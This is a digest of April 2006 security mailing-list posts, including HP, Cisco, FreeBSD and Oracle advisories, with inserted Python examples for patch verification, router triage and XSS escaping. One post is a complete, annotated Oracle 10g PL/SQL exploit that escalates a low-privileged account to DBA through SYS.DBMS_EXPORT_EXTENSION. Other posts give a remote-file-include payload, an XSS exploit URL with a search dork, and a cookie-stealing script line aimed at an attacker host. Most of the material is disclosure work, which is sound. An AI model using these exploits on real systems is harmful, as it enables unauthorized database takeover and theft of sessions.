Potential Security Impact: Remote Execution of Arbitrary Code

Source: Hewlett-Packard Company,
HP Software Security Response Team

VULNERABILITY SUMMARY
A vulnerability has been identified in Sendmail which may allow a
remote attacker to execute arbitrary code.

References: CVE-2006-0058

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.11, B.11.23.

BACKGROUND

CERT has published a vulnerability report available at:
http://www.kb.cert.org/vuls/id/834865

This bulletin will be revised as other versions of Sendmail become
available.

To determine if an HP-UX system has an affected version,
search the output of "swlist -a revision -l fileset"
for one of the filesets listed below. For affected systems
verify that the recommended action has been taken.

AFFECTED VERSIONS

For sendmail 8.13.3
HP-UX B.11.23
==
SMAIL-UPGRADE.INET-SMAIL
SMAIL-UPGRADE.INET2-SMAIL
action: install revision B.11.23.02.002 or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
sendmail-8.13_1123.depot

HP-UX B.11.11
==
SMAIL-UPGRADE.INETSVCS-SMAIL
action: install revision B.11.11.02.002 or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
sendmail-8.13_.depot

For sendmail 8.11.1
HP-UX B.11.23
==
InternetSrvcs.INETSVCS2-RUN
action: install UNOF_INET31734_1.depot or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
UNOF_INET31734_1.depot

 ->HP-UX B.11.11
==
SMAIL-811.INETSVCS-SMAIL
 ->action: remove SMAIL-811 and migrate to SMAIL-UPGRADE
URL: ftp://sendmail:[EMAIL PROTECTED]/
sendmail-8.13_.depot

HP-UX B.11.00
==
SMAIL-811.INETSVCS-SMAIL
action: install revision B.11.00.01.006 or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
sendmail-811_01.006.depot

For sendmail 8.9.3 and previous
HP-UX B.11.11
==
InternetSrvcs.INETSVCS-RUN
action: install UNOF_INET_29774_1.depot or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
UNOF_INET_29774_1.depot

HP-UX B.11.00
==
InternetSrvcs.INETSVCS-RUN
action: install UNOF_INET29773_1.depot or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/
UNOF_INET_29773_1.depot

END AFFECTED VERSIONS


RESOLUTION

HP has made the following software updates available to resolve
the issue.
Installations running sendmail 8.8.6 should upgrade to sendmail
8.9.3 or 8.11.1 from the patch/upgrade software listed in this
bulletin.
Installations running sendmail 8.11.1 on HPUX 11.11 should upgrade
to sendmail 8.13.3 from the upgrade software listed in this
bulletin.

The software updates can be downloaded via ftp from:

System: hprc.external.hp.com (192.170.19.100)
Login: sendmail
Password: sendmail (NOTE: CASE-sensitive)

ftp://sendmail:[EMAIL PROTECTED]/
or
ftp://sendmail:[EMAIL PROTECTED]/

The README.txt.pgp there contains cksum and md5 output for the
preliminary depots.

For sendmail 8.13.3, HP-UX B.11.23
sendmail-8.13_1123.depot
cksum 692720776 15759360
md5 E09933A4AECC16B97A8F7ACF07060F84

For sendmail 8.13.3, HP-UX B.11.11
sendmail-8.13_.depot
cksum 954959898 5130240
md5 C85EFD8AEDB16EEF1DF0FF65988350C0

For sendmail 8.11.1, HP-UX B.11.23
UNOF_INET31734_1.depot
cksum 3327957574 3317760
md5 B17A7F5566214B35E983B3F53C309A17

UNOF_INET31734_1.text
cksum 2096860596 7487
md5 565F7963B77BEE3EB2825990F60D1F6D

 ->For sendmail 8.11.1, HP-UX B.11.11
 ->sendmail-811_08.depot
 ->cksum 3968008060 2938880
 ->md5 91a050b976b522a27558e92673fca591

For sendmail 8.11.1, HP-UX B.11.00
sendmail-811_01.006.depot
cksum 4072259977 2846720
md5 847aa9f1a154da9b07afc26d91fbaba6

sendmail-811_01.006.text
cksum 2379624538 36262
md5 cac0d95747af260f40dac7cc943f6353

For sendmail 8.9.3 and previous, HP-UX B.11.11
UNOF_INET_29774_1.depot
cksum 3708819014 890880
md5 8580A701FC19A49703C852440DBD25FA

For sendmail 8.9.3 and previous, HP-UX B.11.00
UNOF_INET29773_1.depot
cksum 2797348841 1372160
md5 2b33f65a2c81894849a5a6eb7d67650f

UNOF_INET29773_1.text
cksum 2797348841 1372160
md5 67acbcff161b71930365b3b77788fbde

After installation, verify the output of "what /usr/sbin/sendmail".

To check whether an installation is running sendmail 8.8.6, execute
"what /usr/sbin/sendmail"
and check the version string.

 ->Upgrading sendmail 8.8.6 / 8.9.3 to 8.11.1 or 8.13.3 is done
 ->using the depots mentioned in this bulletin.

 ->Sendmail-811 for HP-UX B.11.11
 ->In lieu of installing the upgrade SMAIL-811 consider upgrading
 ->to sendmail 8.13.3 available in SMAIL-UPGRADE.
 ->If servers are running sendmail 8.11.1 and can not be upgraded
 ->to 8.13.3 a solution is available by contacting your support
 ->representative.



MANUAL ACTIONS: Yes - NonUpdate
HP-UX B.11.00 - install preliminary software update
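
The bulletin publishes a cksum (CRC and byte count) and an md5 for each depot because the FTP drop is reached with a shared, published password and gives no integrity guarantee of its own; checking both values before swinstall is the only verification step available. The following Python is an added example and not part of HP's bulletin. POSIX cksum is not the zlib CRC-32 that binascii.crc32 computes (different polynomial handling, the file length is folded in, and the result is complemented), so it is implemented directly here and compared against the bulletin's figures. The expected values in the usage block are copied from the bulletin's entry for sendmail-811_01.006.depot; the local path is an assumption.

```python
import hashlib
from pathlib import Path

# POSIX cksum: CRC-32 with generator polynomial 0x04C11DB7, MSB first, zero
# initial value, the byte length appended LSB-first, final one's complement.
_POLY = 0x04C11DB7
_TABLE = []
for _i in range(256):
    _c = _i << 24
    for _ in range(8):
        _c = (((_c << 1) ^ _POLY) if (_c & 0x80000000) else (_c << 1)) & 0xFFFFFFFF
    _TABLE.append(_c)


def posix_cksum(data: bytes) -> int:
    """CRC as printed in the first column of cksum(1)."""
    crc = 0
    for b in data:
        crc = ((crc << 8) ^ _TABLE[((crc >> 24) ^ b) & 0xFF]) & 0xFFFFFFFF
    n = len(data)                      # fold the length in, least significant byte first
    while n:
        crc = ((crc << 8) ^ _TABLE[((crc >> 24) ^ (n & 0xFF)) & 0xFF]) & 0xFFFFFFFF
        n >>= 8
    return (~crc) & 0xFFFFFFFF


def verify_depot(data: bytes, expected_cksum: int, expected_size: int,
                 expected_md5: str) -> list:
    """Compare a depot's bytes with the bulletin's cksum, size and md5.
    Returns a list of mismatch descriptions; an empty list means all three match."""
    problems = []
    if len(data) != expected_size:
        problems.append("size %d != %d" % (len(data), expected_size))
    got_crc = posix_cksum(data)
    if got_crc != expected_cksum:
        problems.append("cksum %d != %d" % (got_crc, expected_cksum))
    got_md5 = hashlib.md5(data).hexdigest()
    if got_md5 != expected_md5.lower():   # HP lists some digests in upper case
        problems.append("md5 %s != %s" % (got_md5, expected_md5.lower()))
    return problems


def verify_depot_file(path, expected_cksum, expected_size, expected_md5) -> list:
    return verify_depot(Path(path).read_bytes(), expected_cksum, expected_size, expected_md5)


if __name__ == "__main__":
    # Values from the bulletin entry "For sendmail 8.11.1, HP-UX B.11.00";
    # the download location is an assumption.
    depot = Path("/tmp/sendmail-811_01.006.depot")
    if not depot.exists():
        print("download the depot first:", depot)
    else:
        problems = verify_depot_file(depot, 4072259977, 2846720,
                                     "847aa9f1a154da9b07afc26d91fbaba6")
        print("OK: depot matches bulletin" if not problems
              else "MISMATCH: " + "; ".join(problems))
```

Both checks are weak by today's standards (md5 is collision-prone and cksum is a CRC), but they are what the bulletin provides; a mismatch in either is reason not to install.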

Re: [KAPDA::#41] - Mambo/Joomla rss component vulnerability

2006-04-19 Thread rey . gigataras
This issue was addressed in the Joomla! 1.0.8 release:
http://forum.joomla.org/index.php/topic,55808.msg298644.html#msg298644
http://www.joomla.org/content/view/940/74/



Rey Gigataras
-
Joomla! Core Developer
Stability Team Leader
www.joomla.org


Re: Path Disclosure and Arbitrary File Read Vulnerability in SLAB5000

2006-04-19 Thread office
These issues were brought to my attention, and I have patched the page= issue.

I welcome any other friendly prodding of my system. Please notify me if you 
find more vulnerabilities.


Cisco Security Advisory: Cisco IOS XR MPLS Vulnerabilities

2006-04-19 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco IOS XR MPLS Vulnerabilities

Advisory ID: cisco-sa-20060419-xr

http://www.cisco.com/warp/public/707/cisco-sa-20060419-xr.shtml

Revision 1.0

For Public Release 2006 April 19 1500 UTC (GMT)

- -

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

Multiple Multiprotocol Label Switching (MPLS) related
vulnerabilities exist on Cisco IOS XR. Only systems that are running
Cisco IOS XR and configured for MPLS are affected by these
vulnerabilities.

Upon successful exploitation a Modular Services Card (MSC) on a Cisco
Carrier Routing System 1 (CRS-1) or a Line Card (LC) on a Cisco 12000
series router may reload affecting switched traffic.

Cisco has made free software available to address this vulnerability
for affected customers.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20060419-xr.shtml.

Affected Products
=

Vulnerable Products
+--

Only systems that are running Cisco IOS XR and configured for MPLS
are affected by this vulnerability.

Systems that are running Cisco IOS XR and configured for MPLS can be
identified by the show mpls interfaces command. A sample output of
this command on a CRS-1 that is configured for MPLS is given below.

  RP/0/RP1/CPU0:crs1#show mpls interfaces
  Interface                  LDP      Tunnel   Enabled
  -------------------------- -------- -------- --------
  POS0/2/0/0                 Yes      Yes      Yes
  POS0/2/0/1                 No       Yes      Yes
  POS0/2/0/2                 Yes      No       Yes
  POS0/2/0/3                 Yes      Yes      Yes
  GigabitEthernet0/3/1/0     Yes      No       Yes
  GigabitEthernet0/3/1/3     Yes      No       Yes
  POS0/3/0/1                 Yes      Yes      Yes
  TenGigE0/6/0/0             Yes      No       Yes
  RP/0/RP1/CPU0:crs#


In the above output, the fourth column labeled Enabled identifies
MPLS enabled interfaces.

Products Confirmed Not Vulnerable
+

Cisco IOS XR only runs on CRS-1 or Cisco 12000 series routers. Other
Cisco products, including systems that run Cisco IOS are not
affected.

Details
===

Cisco IOS XR Software is a member of the Cisco IOS Software Family
that uses a microkernel based distributed operating system
infrastructure. Cisco IOS XR runs both on Cisco CRS-1 and Cisco 12000
series routers.

More information on Cisco IOS XR can be found at the following URL:

http://www.cisco.com/en/US/products/ps5845/index.html

Modular Services Cards (MSC), also called line cards, are the Layer-3
forwarding engines on the Cisco CRS-1. An MSC is paired with a physical
layer interface module (PLIM) which provides layer-1 and layer-2
services.

More information on Cisco CRS-1 architecture can be found at the
following URL:

http://www.cisco.com/en/US/products/ps5763/index.html

Specific MPLS packets that are switched by a Cisco CRS-1 or a 12000
series system will restart the NetIO process. If the NetIO process is
restarted several times consecutively, the line card will reload
causing a Denial of Service (DoS) condition for the traffic that is
being switched on that line card.

MPLS packets will be forwarded through the MPLS network. Therefore,
packets that can trigger this vulnerability can be sent from remote
systems that are in the MPLS network. Such packets can not be
received on interfaces that are not configured for MPLS.

This vulnerability is addressed by the following Cisco bug IDs:

  * CSCsd15970 -- MSC crash upon receipt of specific MPLS packets
This bug only affects CRS-1 and does not affect Cisco 12000
series routers that are running Cisco IOS XR.

  * CSCsd55531 -- MPLS packet handling problems
This bug only affects CRS-1 and does not affect Cisco 12000
series routers that are running Cisco IOS XR.

  * CSCsc77475 -- Line card crash upon receipt of specific MPLS
packets
This bug affects both CRS-1 and Cisco 12000 series routers that
are running Cisco IOS XR.


Impact
==

Successful exploitation of the vulnerability may result in a reload
of the Modular Services Card (MSC) on a CRS-1 or the line cards on a
Cisco 12000 series router. Repeated exploitation could result in a
sustained DoS attack.

Software Version and Fixes
==

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to
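
The advisory's exposure test reduces to two facts per router: it runs Cisco IOS XR, and at least one interface shows Yes in the Enabled column of show mpls interfaces. The Python below is an added example, not Cisco's code; it parses that command's text output (the sample is the one printed in the advisory, embedded here as a constructed string), returns the MPLS-enabled interfaces, and maps a platform to the bug IDs the advisory says apply to it, so collected output from many routers can be triaged offline.

```python
import re

# The advisory's sample output, embedded as a constructed string for an offline run.
SAMPLE_OUTPUT = """\
RP/0/RP1/CPU0:crs1#show mpls interfaces
Interface                  LDP      Tunnel   Enabled
-------------------------- -------- -------- --------
POS0/2/0/0                 Yes      Yes      Yes
POS0/2/0/1                 No       Yes      Yes
POS0/2/0/2                 Yes      No       Yes
POS0/2/0/3                 Yes      Yes      Yes
GigabitEthernet0/3/1/0     Yes      No       Yes
GigabitEthernet0/3/1/3     Yes      No       Yes
POS0/3/0/1                 Yes      Yes      Yes
TenGigE0/6/0/0             Yes      No       Yes
RP/0/RP1/CPU0:crs#
"""

# Bug IDs and the IOS XR platforms the advisory says each one affects.
BUG_IDS = {
    "CSCsd15970": {"CRS-1"},
    "CSCsd55531": {"CRS-1"},
    "CSCsc77475": {"CRS-1", "12000"},
}

# One data row: interface name followed by the LDP, Tunnel and Enabled columns.
# The prompt lines, the header and the dashed separator do not match this.
_ROW = re.compile(r"^(\S+)\s+(Yes|No)\s+(Yes|No)\s+(Yes|No)$")


def parse_mpls_interfaces(output: str) -> list:
    """Return [(interface, ldp, tunnel, enabled)] with the Yes/No columns as booleans."""
    rows = []
    for line in output.splitlines():
        m = _ROW.match(line.strip())
        if m:
            name, ldp, tunnel, enabled = m.groups()
            rows.append((name, ldp == "Yes", tunnel == "Yes", enabled == "Yes"))
    return rows


def mpls_enabled_interfaces(output: str) -> list:
    """Interfaces whose fourth column (Enabled) is Yes, the test the advisory gives."""
    return [name for name, _ldp, _tunnel, enabled in parse_mpls_interfaces(output) if enabled]


def is_exposed(output: str) -> bool:
    """True when a router already known to run IOS XR has MPLS enabled on any interface."""
    return bool(mpls_enabled_interfaces(output))


def applicable_bugs(platform: str) -> list:
    """Bug IDs to check fixed-software tables against for 'CRS-1' or '12000'."""
    return sorted(bug for bug, platforms in BUG_IDS.items() if platform in platforms)


if __name__ == "__main__":
    for name in mpls_enabled_interfaces(SAMPLE_OUTPUT):
        print("MPLS enabled on", name)
    print("exposed:", is_exposed(SAMPLE_OUTPUT))
    print("CRS-1 bugs:", applicable_bugs("CRS-1"))
    print("12000 bugs:", applicable_bugs("12000"))
```

A router whose output has no Enabled = Yes row is not exposed by this advisory even if it runs IOS XR, which is the case the last assertion in the usage represents.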

XSS Vulnerability in Guest-book script powered by Community Architect

2006-04-19 Thread susam . pal
[This document is best seen with Font: Verdana Size: 9pt]

Advisory Name
===
XSS Vulnerability in Guest-book script powered by Community Architect

Vulnerable Systems
==
Sites providing web-hosting service powered by Community Architect.

Found By
===
Susam Pal

Found On
===
4th April, 2006

Vulnerability Type
=
Cross Site Scripting (XSS)

Action Taken
=
Reported to 20m.com (20m.com is one of the sites powered by Community Architect)

Response
===
20m.com fixed the vulnerability on 10th April, 2006

System Description
==
Many web-hosting sites powered by Community Architect offer free as well as 
paid services to those who want to host a website on their servers. They offer 
customized Guest-book input form page 
(http://www.vulnerablesite.com/fsguest.html), Guest-book page 
(http://www.vulnerablesite.com/fsguestbook.html) along with ready-made script 
(http://www.vulnerablesite.com/cgi-bin/guest) to the web-designer designing a 
website on their servers.

A person visiting the website signs the guest-book by filling in the form at 
http://www.vulnerablesite.com/fsguest.html. On submission, the inputs are 
sent to the script, http://www.vulnerablesite.com/cgi-bin/guest, on the 
server. The script processes the input and updates the page 
http://www.vulnerablesite.com/fsguestbook.html to reflect the new message 
submitted by the user.

Vulnerability Description
=
The script, http://www.vulnerablesite.com/cgi-bin/guest, is vulnerable to XSS 
since it doesn't validate the input for the presence of HTML tags. As a result, 
HTML tags and JavaScript code entered as input in the form at 
http://www.vulnerablesite.com/fsguest.html become part of the HTML code of 
http://www.vulnerablesite.com/fsguestbook.html and hence are executed by the 
browser when any user visits the page.

It provides the attacker an opportunity to inject HTML formatting elements to 
tamper with the display of the page or to inject JavaScript code to trouble the 
user visiting this page.

Contact Information
==
For more information, please contact:-

Susam Pal,
Infosys Technologies Ltd.
Survey No. 210, Manikonda Village
Lingampally, Rangareddy District
Hyderabad, PIN 500019
India
Phone No.: +91-99859521

Email: [EMAIL PROTECTED]
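
The defect described above is one of output encoding: whatever a visitor submits through fsguest.html is written into fsguestbook.html as-is, so a stored payload runs for every later visitor. The Python below is an added example and not the Community Architect guest script (whose source the advisory does not include); it shows a minimal entry renderer in the vulnerable form next to a hardened one that HTML-escapes every field, run over a constructed entry carrying a script tag and an event-handler attribute. The page template, the insertion marker and the field names are assumptions.

```python
import html

# A constructed guest-book submission of the kind fsguest.html would post to
# cgi-bin/guest; the attacker-controlled text is the point of the example.
HOSTILE_ENTRY = {
    "name": "visitor<script>document.location='http://attacker.invalid/?c='+document.cookie</script>",
    "email": "x@example.invalid",
    "message": "Nice site <img src=x onerror=alert(1)>",
}

# Assumed layout of one entry inside fsguestbook.html (text context only).
ENTRY_TEMPLATE = "<p><b>{name}</b> ({email}) wrote:<br>{message}</p>\n"


def render_entry_vulnerable(entry: dict) -> str:
    """What the advisory describes: fields land in the page HTML unmodified,
    so a script tag in the name becomes live markup for every visitor."""
    return ENTRY_TEMPLATE.format(**entry)


def render_entry_safe(entry: dict) -> str:
    """Hardened form: escape <, >, & and both quote characters in every field
    before placing it in an HTML text context. The visitor's text is still
    shown, but as text, not as markup."""
    escaped = {k: html.escape(str(v), quote=True) for k, v in entry.items()}
    return ENTRY_TEMPLATE.format(**escaped)


def append_to_guestbook(page_html: str, entry: dict,
                        marker: str = "<!-- entries -->") -> str:
    """Regenerate fsguestbook.html the way the script does, inserting the
    safely rendered entry at an assumed marker comment."""
    if marker not in page_html:
        raise ValueError("guestbook page has no insertion marker")
    return page_html.replace(marker, render_entry_safe(entry) + marker, 1)


if __name__ == "__main__":
    print("vulnerable:", render_entry_vulnerable(HOSTILE_ENTRY))
    print("hardened:  ", render_entry_safe(HOSTILE_ENTRY))
```

Escaping is the fix for a text context only; if a field is later reused inside an attribute value (for example the e-mail in a mailto: href) or in a script block, that context needs its own encoding and, for URLs, a scheme allowlist.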


Oracle 10g 10.2.0.2.0 DBA exploit

2006-04-19 Thread putosoft softputo

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

-- Step 1: a package in the attacker's own schema (HACKER below) exposing a
-- function with the exact signature of the ODCIIndexGetMetadata callback that
-- Oracle's extensible-indexing (ODCI) framework expects on a domain index type.
-- AUTHID CURRENT_USER makes it an invoker's-rights package: when SYS-owned
-- code calls it (step 2), the current user is SYS and the body runs as SYS.
CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,
                                 P3 VARCHAR2,
                                 p4 VARCHAR2,
                                 env SYS.odcienv)
    RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,
                                 P3 VARCHAR2,
                                 p4 VARCHAR2,
                                 env SYS.odcienv)
    RETURN NUMBER
  IS
    -- GRANT is DDL and commits implicitly; giving the function its own
    -- autonomous transaction lets that commit happen without being rejected
    -- by, or disturbing, the caller's transaction.
    pragma autonomous_transaction;
  BEGIN
    -- Executed with SYS privileges through the call chain in step 2.
    -- HACKER is the attacker's existing low-privileged account.
    EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
    COMMIT;
    RETURN(1);
  END;

END;
/

-- Step 2: SYS.DBMS_EXPORT_EXTENSION is a SYS-owned, definer's-rights package,
-- executable by PUBLIC, that export uses to collect domain-index metadata.
-- It builds a call to TYPE_SCHEMA.TYPE_NAME.ODCIIndexGetMetadata from its
-- arguments and executes it without checking who owns that type, so pointing
-- it at the package above makes SYS run the GRANT. INDEX_NAME is arbitrary;
-- VERSION is set to the target release.
DECLARE
  INDEX_NAME   VARCHAR2(200);
  INDEX_SCHEMA VARCHAR2(200);
  TYPE_NAME    VARCHAR2(200);
  TYPE_SCHEMA  VARCHAR2(200);
  VERSION      VARCHAR2(200);
  NEWBLOCK     PLS_INTEGER;
  GMFLAGS      NUMBER;
  v_Return     VARCHAR2(200);
BEGIN
  INDEX_NAME   := 'A1';            INDEX_SCHEMA := 'HACKER';
  TYPE_NAME    := 'MYBADPACKAGE';  TYPE_SCHEMA  := 'HACKER';
  VERSION      := '10.2.0.2.0';    GMFLAGS      := 1;

  v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
    INDEX_NAME   => INDEX_NAME,
    INDEX_SCHEMA => INDEX_SCHEMA,
    TYPE_NAME    => TYPE_NAME,
    TYPE_SCHEMA  => TYPE_SCHEMA,
    VERSION      => VERSION,
    NEWBLOCK     => NEWBLOCK,
    GMFLAGS      => GMFLAGS
  );
END;
/





[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability

2006-04-19 Thread admin
[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability 
---
Software: ActualAnalyzer
Type: Remote File Include Vulnerability
Date: April, 19th 2006
Vendor: ActualScripts
Page: http://actualscripts.com
Risk: High


Credits:

Discovered by: 'Aesthetico'
http://www.majorsecurity.de


Affected Products:

ActualAnalyzer Lite 2.72   and prior
ActualAnalyzer Gold 7.63   and prior
ActualAnalyzer Server 8.23 and prior

Description:

ActualAnalyzer is a powerful statistics-gathering and analysis tool for 
monitoring web site traffic. 
It is equally effective for sites with low and high volumes of traffic 
and provides a wealth of comparative and analytical information.
High performance is achieved by using a MySQL database. 


Requirements:

register_globals = On


Vulnerability:

Input passed to the "rf" parameter in "direct.php" is not
properly verified, before it is used to include files. This can be
exploited to include arbitrary files from external resources.


Solution:

Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".


Exploitation:

Post data:
rf=http://www.yourspace.com/yourscript.php?


FreeBSD Security Advisory FreeBSD-SA-06:14.fpu

2006-04-19 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

=
FreeBSD-SA-06:14.fpu                                        Security Advisory
                                                          The FreeBSD Project

Topic:  FPU information disclosure

Category:   core
Module: sys
Announced:  2006-04-19
Credits:Jan Beulich
Affects:All FreeBSD/i386 and FreeBSD/amd64 releases.
Corrected:  2006-04-19 07:00:35 UTC (RELENG_6, 6.1-STABLE)
2006-04-19 07:00:50 UTC (RELENG_6_1, 6.1-RELEASE)
2006-04-19 07:01:12 UTC (RELENG_6_0, 6.0-RELEASE-p7)
2006-04-19 07:01:30 UTC (RELENG_5, 5.5-STABLE)
2006-04-19 07:01:53 UTC (RELENG_5_4, 5.4-RELEASE-p14)
2006-04-19 07:02:23 UTC (RELENG_5_3, 5.3-RELEASE-p29)
2006-04-19 07:02:43 UTC (RELENG_4, 4.11-STABLE)
2006-04-19 07:03:01 UTC (RELENG_4_11, 4.11-RELEASE-p17)
2006-04-19 07:03:14 UTC (RELENG_4_10, 4.10-RELEASE-p23)
CVE Name:   CVE-2006-1056

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
<http://www.freebsd.org/security/>.

I.   Background

The floating-point unit (FPU) of i386 and amd64 processors is derived from
the original 8087 floating-point co-processor.  As a result, the FPU
contains the same debugging registers FOP, FIP, and FDP which store the
opcode, instruction address, and data address of the instruction most
recently executed by the FPU.

On processors implementing the "SSE" instruction set, a new pair of
instructions fxsave/fxrstor replaces the earlier fsave/frstor pair used
for saving and restoring the FPU state.  These new instructions also
save and restore the contents of the additional registers used by SSE
instructions.

II.  Problem Description

On "7th generation" and "8th generation" processors manufactured by AMD,
including the AMD Athlon, Duron, Athlon MP, Athlon XP, Athlon64, Athlon64
FX, Opteron, Turion, and Sempron, the fxsave and fxrstor instructions do
not save and restore the FOP, FIP, and FDP registers unless the exception
summary bit (ES) in the x87 status word is set to 1, indicating that an
unmasked x87 exception has occurred.

This behaviour is consistent with documentation provided by AMD, but is
different from processors from other vendors, which save and restore the
FOP, FIP, and FDP registers regardless of the value of the ES bit.  As a
result of this discrepancy remaining unnoticed until now, the FreeBSD
kernel does not restore the contents of the FOP, FIP, and FDP registers
between context switches.

III. Impact

On affected processors, a local attacker can monitor the execution path
of a process which uses floating-point operations.  This may allow an
attacker to steal cryptographic keys or other sensitive information.

IV.  Workaround

No workaround is available, but systems which do not use AMD Athlon, Duron,
Athlon MP, Athlon XP, Athlon64, Athlon64 FX, Opteron, Turion, or Sempron
processors are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 4-STABLE, 5-STABLE, or 6-STABLE,
or to the RELENG_6_0, RELENG_5_4, RELENG_5_3, RELENG_4_11, or
RELENG_4_10 security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 4.10,
4.11, 5.3, 5.4, and 6.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 4.x]
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu4x.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu4x.patch.asc

[FreeBSD 5.x and 6.x]
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<http://www.freebsd.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch   Revision
  Path
- -
RELENG_4
  src/sys/i386/isa/npx.c 1.80.2.4
RELENG_4_11
  src/UPDATING 1.73.2.91.2.18
  src/sys/conf/newvers.sh  1.44.2.39.2.21
  src/sys/i386/isa/npx.c1.80.2.3.14.1
RELENG_4_10
  src/UPDATING 1.73.2.90.2.24
  src/sys/conf/newvers.sh  1.44.2.34.2.25
  src/sys/i386/isa/npx.c   

SQL Injection in package SYS.DBMS_LOGMNR_SESSION

2006-04-19 Thread ak
SQL Injection in package SYS.DBMS_LOGMNR_SESSION

Name               SQL Injection in package SYS.DBMS_LOGMNR_SESSION
Systems Affected   Oracle Database
Severity           Medium Risk
Category           SQL Injection (DB06)
Vendor URL         http://www.oracle.com/
Author             Alexander Kornbrust (ak at red-database-security.com)
Advisory           18 April 2006 (V 1.00)
Oracle Bugid       6980723


Details
###
The package SYS.DBMS_LOGMNR_SESSION contains a SQL injection vulnerability in 
the procedure DELETE_FROM_TABLE.
Oracle fixed this problem by using the package DBMS_ASSERT.

This advisory
##
http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_logmnr_session.html


Patch Information
#
Apply the patches for Oracle CPU April 2006 on top of Oracle 9i Release 2 or 
Oracle 10g Release 1.
The patches are available via Oracle Metalink.



History
###
01-nov-2005 Oracle secalert was informed
02-nov-2005 Oracle secalert asked for an exploit
18-apr-2006 Oracle published CPU April 2006
18-apr-2006 Advisory published



Additional information
##
An analysis of the Oracle CPU April 2006 is available here
http://www.red-database-security.com/advisory/oracle_cpu_apr_2006.html

Many (40+) open security issues in Oracle are still unfixed
http://www.red-database-security.com/advisory/upcoming_alerts.html


CuteNews 1.4.1 <= Cross Site Scripting

2006-04-19 Thread sn4k3 . 23
// CuteNews 1.4.1 <= Cross Site Scripting //

-

[~] Advisory by: LoK-Crew ~ Snake_23

[-] Exploit: 
http://www.example.com/index.php?mod=editnews&action=editnews&id=1145397112&source=[XSS]

[-] Googledork: Powered by CuteNews 1.4.1 

[+] Greetz to: PHCN
[+] Visit: www.LoK-Crew.de.am